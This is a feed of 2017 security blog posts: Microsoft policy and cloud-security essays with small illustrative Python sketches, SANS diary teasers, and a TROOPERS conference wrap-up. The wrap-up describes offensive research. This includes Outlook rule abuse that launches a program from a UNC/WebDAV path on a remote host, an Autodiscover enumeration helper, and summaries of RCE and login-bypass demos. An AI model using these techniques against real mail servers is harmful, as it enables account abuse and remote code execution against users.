Wednesday, March 29, 2017

Future-proofing principles against technological change

In recent years, governments’ concerns about cybersecurity, data protection, and other information and communications technology (ICT) related issues have led to new policies, legislation, and regulation. In response, the ICT industry has consistently called for laws and rules that focus on outcomes and on principles, rather than on processes and prescriptions. This call has become so ubiquitous, however, that there is a danger it has become a hollow form of words. A truly outcome-oriented approach would be revolutionary, and governments or even industry may shy away from it, having forgotten why we need this approach in the first place.

So, I’d like to take a moment to re-examine the why and the how of outcomes- and principles-led legislation and regulation.

Technology moves fast; in 2007 we had the first iPhone and now we’re rolling out cloud computing. As a result, laws designed for telephony or paper files are increasingly difficult to apply, if not wholly irrelevant. Governments are acting on this realization, but as they do so they are inevitably looking to enshrine certain unchangeable points of principle into their new laws – from European privacy to American freedom of speech. And this is where the essential rationale for principles-led approaches is most obvious. Immovable principles could be laid down as particular behaviors within particular technologies, but then they would live and die with that technology. Allowing unchangeable points of principle to become contingent on something we know will change, i.e. technology, won’t work for governments or societies. A different approach is needed, one that future-proofs our principles against technological change.

So how would that actually work? On the surface it seems simple enough: governments state the outcomes they expect or principles they demand, give whatever limited controls/incentives they think necessary, and allow ICT providers and regulators to get on with it. The reality is necessarily more complex. For one thing, even within a single nation there may be varied societal perspectives on what is wanted in principle. For another, the outcomes of today’s solutions can form tomorrow’s problems. In light of this, an effective “future-proofing” process may require new policy or regulatory bodies that are more flexible and more broad-based, because they can take account of divergent priorities and can also look more clearly at future consequences.

In the ferment of technological change, we can forget that society changes too, sometimes profoundly. Once-concrete principles can shift over time, and what was once acceptable or helpful can cease to be so. Amusingly, I know someone who is a Freeman of the City of London, with a right to drive sheep across a bridge over the Thames. This might have been very useful at one point, but today most people would rather have free parking. More seriously, in the past women and minorities have been unfairly treated (and in places still are, even today). Applying this insight to the heart of law- and rule-making might seem odd, especially to the lawyers and technocrats that currently dominate the process. But if a principles-led approach is to have true meaning and longevity, then the inclusiveness of the process must be genuine.

Equally, what seems like a good solution today can have unintended consequences. In the 1890s motorized vehicles solved the problem of horse-drawn vehicles’ endless manure and carcasses, but eventually led to pollution and transport crises. In the 1920s leaded petrol solved “knocking” in automobile motors but paved the way for “a catastrophe for public health”. In the 1990s and 2000s diesel and biofuels answered petrol’s CO2 emissions but caused particulate air pollution and food-supply problems. The chance of unintended consequences from government interventions in ICT is even more significant. Technology has spread throughout our lives, businesses, and governments. As a result, unexpectedly problematic outcomes are more likely and potentially more damaging. Any structured process supporting an outcomes-led approach needs the breadth of insight and expertise to minimize this risk. This means, once again, expanding the participants in the new approach beyond the current roster of legal and regulatory experts.

In conclusion, in order to help formulate lasting policies, law and regulations with a genuine focus on outcomes and principles, governments will need advice from new bodies with diverse legal, technical, social, and even philosophical membership. The new, non-traditional membership of these bodies will likely have to go beyond current “public private partnerships” if they are to deal with the operational differences, varying priorities, and distinct needs of those affected by new rules – now and in the foreseeable future. This will be a revolution in policy-making, equal in its own way to the technological revolution that has sparked it.

 

 



from Paul Nicholas

[SANS ISC] Logical & Physical Security Correlation

I published the following diary on isc.sans.org: “Logical & Physical Security Correlation“.

Today, I would like to review an example of how we can improve our daily security operations or, for our users, how to help in detecting suspicious content. Last week, I received the following email in my corporate mailbox. The mail is written in French but easy to understand: it is a notification regarding a failed delivery (they pretended that nobody was present at the delivery address to pick up the goods)… [Read more]

[The post [SANS ISC] Logical & Physical Security Correlation has been first published on /dev/random]



from Xavier

Tuesday, March 28, 2017

Germany steps up leadership in cybersecurity

Cyberattacks are on the rise worldwide, but many countries are making strides in promoting and developing cybersecurity by developing policy frameworks, encouraging investment in research and development, and by driving awareness of cybersecurity best practices. Germany is one of the countries that has been trying to increase the cybersecurity of its broader online ecosystem for a number of years and is today more committed to that goal than ever. And what Germany does matters not just because it is one of the top five global economies, but because it is one of the leading European Union (EU) member states. What German policy-makers think and feel can have a major effect on the EU, a trading bloc of 500 million people with a GDP on a par with that of the USA.

Microsoft’s Security Intelligence Report (SIR) shows Germany performs well compared to the global average when it comes to encounters with malware and the number of infected computers (see the regional breakdown specific to Germany). Overall, the SIR shows the ongoing nature of the conflict between those delivering cybersecurity and those trying to break through it, and even in Germany in 2016 there was an uneven but upward trend in encounters and infections.

A fundamental part of responding to these threats and the potentially significant economic damage they pose is, in my view, cooperation between government and the private sector. The new cybersecurity strategy seems to indicate that this is also the view of German policy-makers. Germany’s recognition of the importance of developing and implementing effective cyber security norms – along with the necessary means of verification/attribution – is very encouraging. And German support and leadership in the pertinent multi-lateral discussions will be crucial. In this context, it is worth noting that German leadership, during its 2016 Chairmanship of the Organization for Security and Co-operation in Europe, yielded concrete positive results in the related field of developing cybersecurity related confidence-building measures – which critically rely on different segments of society working together.

The strategy builds on Germany’s IT Security Law (IT-SiG), passed in 2015, which promoted cooperation between the German Federal Office for Information Security (BSI) and the industry in protecting critical infrastructure. Infrastructure protection is, of course, only one aspect of cybersecurity, and cooperation between governments and the private sector is only one part of the overall solution (for example, my Microsoft colleagues have also been arguing strongly for risk-based approaches to cybersecurity). Nonetheless, both the IT-SiG and the proposed strategy seem to be steps in the right direction. Cooperation between states and the private sector, including those who create information and communication technology (ICT) products and those who use them, seems like a very good way to develop effective cybersecurity policies and practices. What is true for Germany should be equally true for other EU member states.

The challenge is that, currently, not all companies may be happy about information exchange with the authorities (only 13 percent of companies in Germany are). It would be a terrible irony if, just as governments realize the need for public-private partnerships in cybersecurity, companies were to step back from the opportunity. To prevent such a development, IT regulators will have to demonstrate the added value of receiving this information. They can do this by anonymizing it and sharing it with those private-sector entities that need to know about it, so that they can act on it to protect their systems and their customers.
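To illustrate that anonymize-then-share flow, here is a hypothetical Python sketch. It is not a description of any regulator's actual process; the field names and the salted-hash scheme are assumptions chosen for the example:

```python
import hashlib

# Fields that identify the reporting organization and should not leave
# the regulator; everything else is useful to other defenders.
IDENTIFYING_FIELDS = {"company", "contact", "internal_ip"}

def anonymize(report: dict, salt: str = "per-batch-secret") -> dict:
    """Replace identifying fields with salted hash tokens so recipients
    can correlate repeat reports without learning who filed them."""
    shared = {}
    for key, value in report.items():
        if key in IDENTIFYING_FIELDS:
            digest = hashlib.sha256((salt + str(value)).encode()).hexdigest()
            shared[key] = digest[:12]  # opaque but stable token
        else:
            shared[key] = value
    return shared
```

The salt prevents recipients from brute-forcing the hidden values, while keeping the tokens stable within one sharing batch so that repeated reports about the same victim still correlate.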

Looking ahead, in order to enhance IT security in general and increase the protection of critical infrastructure in particular, public-private partnerships are essential, but they require commitment and buy-in from both sides. Microsoft is ready to play its part.

 



from Paul Nicholas

Monday, March 27, 2017

Giving CISOs assurance in the cloud

This post is authored by Mark McIntyre, Chief Security Advisor, Enterprise Cybersecurity Group.

Recently, I hosted a Chief Information Security Officer roundtable in Washington, DC. Executives from several US government agencies and systems integrators attended to share cloud security concerns and challenges, such as balancing collaboration and productivity against data protection needs, cyber threat detection, and compliance. Toward the end of the day, one CISO reminded me he needed assurance. He asked, “How can we trust Microsoft to protect our data? And, how can I believe what you say?”

This post provides an opportunity to share important updates and assurances about practices and resources that Microsoft uses to protect data and user privacy in the Cloud. It also offers information on resources available to CISOs and others that demonstrate our continuing investments in transparency.

Security at scale

Increasingly, government officials as well as industry analysts and executives are recognizing and evangelizing the security benefits of moving to hyper-scale cloud service providers.  Microsoft works at this scale, investing $15B in the public cloud.  The internet user maps below provide useful insight into why and where we are making these investments. Figure 1 represents internet usage in 2015. The size of each box reflects the number of users.  The colors indicate the percentage of people with access to the internet.

Figure 1, source “Cyberspace 2025: Today’s Decisions, Tomorrow’s Terrain”

Now look at Figure 2, showing expected internet usage in 2025.  As you can see, global internet use and accompanying economic activity will continue to grow.

Figure 2

In addition to serving millions of people around the world, we are also moving Microsoft’s 100,000+ employees and our corporate infrastructure and data to the Cloud. We must therefore be confident that we can protect our resources as well as our users’.

How do we do it?  Microsoft invests over $1B per year in cybersecurity and data protection.  We start by ensuring that the software powering our data centers is designed, built and maintained as securely as possible. This video illustrates the world-class security Microsoft applies to data center protection.  We also continue to improve on years of development investments in the Security Development Lifecycle (SDL), to ensure that security is addressed at the very beginning stages of any product or service.  In the Cloud, the Operational Security Assurance framework capitalizes on the SDL and on Microsoft’s deep insights into the cybersecurity threat landscape.

One way that Microsoft detects cybersecurity activity in our data centers is the Intelligent Security Graph. Microsoft analyzes an incredible breadth and depth of signal: 450B authentications per month across our cloud services, 400B emails scanned for spam and malware, over a billion enterprise and consumer devices updated monthly, and 18B+ Bing web page scans per month. This intelligence, enhanced by the rich expertise of Microsoft’s world-class security researchers, analysts, hunters, and engineers, is built into our products and our platform, enabling customers, and Microsoft, to detect and respond to threats more quickly (Figures 3 & 4).  Microsoft security teams use the graph to correlate large-scale critical security events, using innovative cloud-first machine learning and behavior- and anomaly-based search queries, to surface actionable intelligence.  The graph enables teams to collaborate internally and apply preventive measures or mitigations in near real time to counter cyber threats.  This supports protection for users around the world, and assures CISOs that Microsoft has the breadth and scale to monitor and protect users’ identities, devices, apps, data, and infrastructure.

Figure 3

Figure 4

Access to data

Technology is critical for advancing security at hyper-scale, so Microsoft continues to evolve the ways in which administrators access corporate assets.  The role of network administrators is significant. In our cloud services, we employ Just-in-Time and Just Enough Administration access, under which admins are granted the bare minimum window of time and of physical and logical access needed to carry out a validated task.  No admin may create or approve their own ticket, either. Further, customers can implement these policies internally with Windows Server 2016. Securing and managing data centers at scale is an ever-evolving process based on the needs of our customers, the changing threat landscape, regulatory environments, and more.
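As a rough illustration of that time-boxed, task-scoped access model (hypothetical names only, not Microsoft's actual implementation), a minimal sketch might look like:

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

@dataclass
class AccessTicket:
    admin: str
    approver: str
    task: str          # the validated task this ticket covers
    expires: datetime  # bare-minimum window of time

def grant_ticket(admin: str, approver: str, task: str,
                 window_minutes: int = 30) -> AccessTicket:
    # No admin may create or approve their own ticket.
    if admin == approver:
        raise PermissionError("self-approval is not allowed")
    expiry = datetime.now(timezone.utc) + timedelta(minutes=window_minutes)
    return AccessTicket(admin, approver, task, expiry)

def is_valid(ticket: AccessTicket, task: str) -> bool:
    # Access is scoped to the named task and to the time window.
    return task == ticket.task and datetime.now(timezone.utc) < ticket.expires
```

The key design points mirrored here are the expiry window, the task scoping, and the separation between requester and approver.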

Compliance

Microsoft works with auditors and regulators around the world to ensure that we operate data centers at the highest levels of security and operational excellence.  We maintain the largest compliance portfolio in the industry, for example against the ISO 22301 business continuity standard. In addition, Microsoft maintains certifications such as CSA STAR Certification, HITRUST, FACT and CDSA, which many of our cloud competitors do not.  For more about Microsoft certifications, visit the Microsoft Trust Center Compliance page.

Transparency

Being compliant with local, industry, and international standards establishes that Microsoft is trustworthy, but our goal is to be trusted.  Toward that end, and to ensure we address the needs of CISOs, Microsoft provides a wealth of information about cloud services, designed to provide direct and customer self-service opportunities to answer three key questions:

  • How is my data secured and protected?
  • How does Microsoft Cloud help me be compliant with my regulatory needs?
  • How does Microsoft manage privacy around my data?

The comments at our roundtable that prompted this blog show that our cloud security and compliance resources can be difficult to find, so while we double down on our efforts to raise awareness, bookmark this update and read below.  We operate the following portals, designed to facilitate self-service access to security and compliance information, FAQs and white papers, in convenient formats, and tailored to an organization’s geography, industry and subscription(s):

  • The Microsoft Trust Center, a centralized resource for enterprise customers to find answers about what Microsoft is doing to protect data, comply with regulatory requirements, and verify that we are doing what we say.
  • The Service Trust Portal (STP) is available, under nondisclosure, to current and potential Microsoft customers. It includes hundreds of important third-party audit reports, information on certifications, and internal security documents for Azure, O365, Dynamics CRM Online, and Yammer. Examples include SOC and ISO audit reports.
  • The Service Assurance Portal, available to current O365 users, offers the same level of access, but directly through the O365 subscription. This is a unique “transparency window” that provides customers with an in-depth understanding of how we implement and test controls to manage the confidentiality, integrity, availability, reliability, and privacy of customer data. Not only do we share the “what” about controls, but also the “how” of testing and implementation.

Government Security Program

Microsoft also participates in the Government Security Program as another key transparency initiative. Through the GSP, national governments (including regulators) may access deep architecture details about our products and services, up to and including source code. The GSP also provides participants with opportunities to visit Microsoft headquarters in Redmond to meet face to face with the teams that operate, monitor, and defend our company and products and services—including data centers—from cyber threats. They can also visit any of our Transparency Centers in Redmond, Brussels, Brasilia, and Singapore. Several dozen governments around the world use the GSP to obtain greater insight into how Microsoft builds, operates and defends its data centers, and by extension, how we protect users.

Microsoft stands ready to work with CISOs to raise awareness and ensure access to the resources discussed above. Visit the following sites to learn more. Microsoft has also created a dedicated team of cybersecurity professionals to help move you securely to the Cloud and protect your data. Learn more about the Enterprise Cybersecurity Group, or contact your local Microsoft representative.

Blogs: Microsoft Secure Blog and Microsoft On the Issues
Learn more about the Microsoft Enterprise Cloud
Read the Microsoft Security Intelligence Report
Follow us on Twitter: @MSFTSecurity



from Microsoft Secure Blog Staff

What you need to know about CASBs

Per Frost & Sullivan, more than 80 percent of employees admit to using non-approved SaaS apps in their jobs. The number of cloud services used by corporate employees is also quickly outpacing internal IT estimates. While IT groups typically estimate that employees are using 51 different services, the actual number is 15 times greater.

And it’s not just individual employees that are turning to shadow IT. Increasingly, non-approved SaaS applications are being adopted by entire work groups or departments, without IT’s knowledge, and with little consideration for the security risks they bring.

As employees continue to reach for tools and services that may not be IT-approved, IT professionals know they need to balance security risk tolerance against empowering departments and teams to achieve higher productivity.

How can you secure critical data without compromising productivity?

While the urge to block shadow IT is understandable, it is, at best, a short-term solution. Not only does it reduce an organization’s ability to innovate, it inevitably results in employees finding ways around the restrictions.

Rather than blocking users from accessing the services they need to do their jobs efficiently, IT administrators need to find ways to monitor these services, analyze their risk profile, and offer alternatives for apps that fail to meet security or compliance needs.

Cloud Access Security Brokers: Flexibility meets control

According to Gartner, Cloud Access Security Brokers (CASBs) are “on-premises or cloud-based security policy enforcement points that are placed between cloud service consumers and cloud service providers.”

They give organizations a detailed picture of how their employees are using the cloud.

  • Which apps are they using?
  • Are these apps risky for my organization?
  • Who are the top users?
  • What does the upload/download traffic look like?
  • Are there any anomalies in user behavior such as: impossible travel, failed logon attempts, suspicious IPs?

Such behaviors can indicate whether a user’s account has been compromised or whether the user is taking unauthorized actions.
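For instance, the “impossible travel” anomaly listed above can be approximated by computing the travel speed implied by two logins from different locations. This is an illustrative sketch, not any vendor's implementation; the 900 km/h threshold and the (timestamp, lat, lon) tuple format are assumptions:

```python
from math import radians, sin, cos, asin, sqrt

def haversine_km(lat1, lon1, lat2, lon2):
    # Great-circle distance between two points, in kilometres.
    lat1, lon1, lat2, lon2 = map(radians, (lat1, lon1, lat2, lon2))
    a = (sin((lat2 - lat1) / 2) ** 2
         + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2)
    return 2 * 6371 * asin(sqrt(a))

def impossible_travel(login_a, login_b, max_speed_kmh=900):
    """Flag two logins for the same account whose implied travel speed
    exceeds what a commercial flight could plausibly achieve.
    Each login is a (epoch_seconds, latitude, longitude) tuple."""
    (t1, lat1, lon1), (t2, lat2, lon2) = sorted([login_a, login_b])
    hours = (t2 - t1) / 3600 or 1e-9  # avoid division by zero
    return haversine_km(lat1, lon1, lat2, lon2) / hours > max_speed_kmh
```

A login from Brussels followed an hour later by one from Singapore would be flagged; two logins twelve hours apart in the same city would not.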

Along with better threat protection, CASBs offer IT professionals better visibility and control over the apps used in their environment. Once you have discovered the full extent of the apps used in your environment, you can then set policies that control the data stored in these apps for data loss prevention.

Exploring a CASB solution can be a great step to enhancing your security environment. With better visibility, protection, and management over your shadow IT, you can give employees the choice to use the apps they need, without sacrificing the security and compliance your organization demands.

To learn more about shadow IT and how CASBs can help your organization, download the e-book.



from Microsoft Secure Blog Staff

Friday, March 24, 2017

[SANS ISC] Nicely Obfuscated JavaScript Sample

I published the following diary on isc.sans.org: “Nicely Obfuscated JavaScript Sample“.

One of our readers sent us an interesting sample that was captured by his anti-spam. The suspicious email had an HTML file attached to it. By having a look at the file manually, it is heavily obfuscated and the payload is encoded in a unique variable… [Read more]

[The post [SANS ISC] Nicely Obfuscated JavaScript Sample has been first published on /dev/random]



from Xavier

TROOPERS 2017 Day #4 Wrap-Up

I’m just back from Heidelberg, so here is the last wrap-up for the TROOPERS 2017 edition. This day was a little more difficult due to fatigue after yesterday’s social event. That’s why the wrap-up will be shorter… The second keynote was presented by Mara Tam: “Magical thinking … and how to thwart it”. Mara is an advisor to executive agencies on information security issues. Her job focuses on the technical and strategic implications of regulatory and policy activity. In my opinion, the keynote topic was fairly classic. Mara explained her vision of the problems that the infosec community is facing when information must be exchanged with “the outside world”. Personally, I found that Mara’s slides were difficult to understand.

For the first presentation of the day, I stayed in the main room – the offensive track – to follow “How we hacked distributed configuration management systems” by Francis Alexander and Bharadwaj Machhiraju. As we saw yesterday with SDN, automation is a hot topic and companies tend to install specific tools to automate configuration tasks. Such software is called DCM, or “Distributed Configuration Management”. DCMs simplify the maintenance of complex infrastructures, synchronization, and service discovery. But, like any software, they have bugs and vulnerabilities and are a nice target for a pentester. They’re real goldmines because they contain not only configuration files; if an attacker can change those files, it’s even more dangerous. DCMs can be agent-less or agent-based. The latter was the target of Francis & Bharadwaj. They reviewed three tools:

  • HashiCorp Consul
  • Apache Zookeeper
  • CoreOS etcd

For each tool, they explained the vulnerabilities they found and how they were exploited, up to remote code execution. The crazy part is that none of them has authentication enabled by default! To automate the discovery and exploitation of DCMs, they developed a specific tool called Garfield. Nice demos were performed during the talk, with many remote shells and calc.exe instances spawned here and there.

The next talk was my favourite of the day. It was about a tool called Ruler, used to pivot through Exchange servers. Etienne Stalmans presented his research on Microsoft Exchange and how he reverse-engineered the protocol. The goal is simply to get a shell through Exchange. The classic phases of an attack were reviewed:

  • Reconnaissance
  • Exploitation
  • Persistence (always better!)

Basically, Exchange is a mail server, but many more features are available: calendar, Lync, Skype, etc. Exchange must be able to serve local and remote users, so it exposes services on the Internet. How do we identify companies that use an Exchange server, and how do we find it? Simply via the auto-discovery feature implemented by Microsoft: if your domain is company.com, Outlook will search for https://company.com/autodiscover/autodiscover.xml (plus other alternative URLs if this one isn’t available). Etienne did some research and found that 10% of Internet domains have this process enabled. After some triage, he found that approximately 26,000 domains are linked to an Exchange server. Nice attack surface! The next step is to compromise at least one account. Here, classic methods can be used (brute force, a rogue wireless AP, phishing, or dumps of leaked databases). The exploitation itself is performed by creating a rule that executes a script. The rule looks like: when the word “pwned” is present in the subject, start “badprogram.exe”. A very nice finding is the way Windows converts a UNC path to WebDAV:

\\host.com@SSL\webdav\pew.zip\s.exe

will be converted to:

https://host.com/webdav/pew.zip

And Windows will even extract s.exe for you! Magic!
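The two mechanics above, Autodiscover probing and UNC-to-WebDAV conversion, can be sketched in Python. This is a simplified illustration: real clients try more fallbacks (SRV records, redirects), and the helper names are hypothetical:

```python
def autodiscover_candidates(domain: str) -> list:
    """Candidate Autodiscover endpoints an Outlook-like client probes
    for a domain (simplified probe order)."""
    path = "/autodiscover/autodiscover.xml"
    return [
        f"https://{domain}{path}",
        f"https://autodiscover.{domain}{path}",
        f"http://autodiscover.{domain}{path}",
    ]

def unc_to_webdav(unc: str) -> str:
    # Mimic Windows' mapping of a UNC path to a WebDAV URL, e.g.
    # \\host.com@SSL\webdav\pew.zip\s.exe -> https://host.com/webdav/pew.zip/s.exe
    host, _, path = unc.lstrip("\\").partition("\\")
    scheme = "http"
    if host.endswith("@SSL"):
        scheme = "https"
        host = host[:-4]  # drop the @SSL marker
    web_path = path.replace("\\", "/")
    return f"{scheme}://{host}/{web_path}"
```

The `@SSL` marker is what switches the redirector from HTTP to HTTPS, which is why the observed request goes to the https:// URL of the archive rather than to the executable inside it.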

Etienne performed a nice demo of Ruler, which automates the whole process described above. Then he demonstrated another tool, called Linial, which takes care of persistence. To conclude, Etienne briefly explained how to harden Exchange against this kind of attack. Outlook 2016 blocks unsafe rules by default, which is good. An alternative is to block WebDAV and use MFA.

After lunch, Zoz came back with another fun presentation: “Data Demolition: Gone in 60 seconds!”. The idea is simple: when you throw away devices, you must be sure that they don’t contain any remaining critical data. Classic examples are hard drives and printers, but also highly mobile devices like drones. The talk was a kind of “MythBusters” show for hard drives! Zoz tested different techniques:

  • Thermal
  • Kinetic
  • Electric

For each of them, different scenarios were presented and the results demonstrated with short videos. Crazy!

Destroying HD's

What was interesting to note is that most techniques failed because the disk platters could still be “cleaned” (e.g., by removing the dust) and might then be readable using forensic techniques. For your information, the most effective techniques were: a plasma cutter or oxygen injector, nail guns, and a high-voltage power spike. Just one piece of advice: don’t try this at home!

There was a surprise talk in the schedule, and the time slot was offered to The Grugq. A renowned security researcher, he presented “Surprise Bitches, Enterprise Security Lessons From Terrorists”. He talked about APTs, but not as a buzzword: he gave his own view of how APTs work. For him, the term “APT” was invented by Americans and means “Asia Pacific Threat“.

I finished the day back in the offensive track. Mike Ossmann and Dominic Spill from Great Scott Gadgets presented “Exploring the Infrared, part 2“. The first part was presented at Shmoocon. Fortunately, they started with a quick recap: what is infrared light, and what are its applications (remote controls, sensors, communications, heating systems, …)? The talk was a series of nice demos in which they used replay-attack techniques to abuse tools and toys that work with IR, like a Duck Hunt game and a shark remote controller. The most impressive was the replay attack against the Bosch audio transmitter. This very expensive device is used at big events for live translation. They were able to reverse-engineer the protocol and play a song through the device… You can imagine the impact of such an attack at a live event (e.g., switching voices, replacing translations with others, etc.). They have many more tests in the pipeline.

IR Fun

The last talk was “Blinded Random Block Corruption” by Rodrigo Branco. Rodrigo is a regular speaker at TROOPERS and always provides good content. His presentation was very impressive. The idea is to evaluate the problems around memory encryption: how and why should it be used? Physical access to the victim is the worst case: an attacker has access to everything. You implemented full-disk encryption? Cool, but a lot of information sits in memory while the system is running. Access to memory can be gained via FireWire, PCIe, PCMCIA, and new USB standards. What about memory encryption? It’s good, but encryption alone is not enough: integrity controls must be implemented. The attack explained by Rodrigo is called “BRBC”, or “Blinded Random Block Corruption“. After giving the details, he performed a nice demo: how to become root on a locked system. Access to memory is even easier in virtualized (or cloud) environments. Indeed, many hypervisors allow a “debug” feature to be enabled per VM. Once activated, the administrator has write access to the VM’s memory. Using a debugger, you can mount the BRBC attack and bypass the login procedure. The video demo was impressive.

So, the TROOPERS 10th anniversary edition is over. I spent four awesome days attending nice talks and meeting a lot of friends (old & new). I learned a lot and my to-do list has already expanded.

 

[The post TROOPERS 2017 Day #4 Wrap-Up has been first published on /dev/random]



from Xavier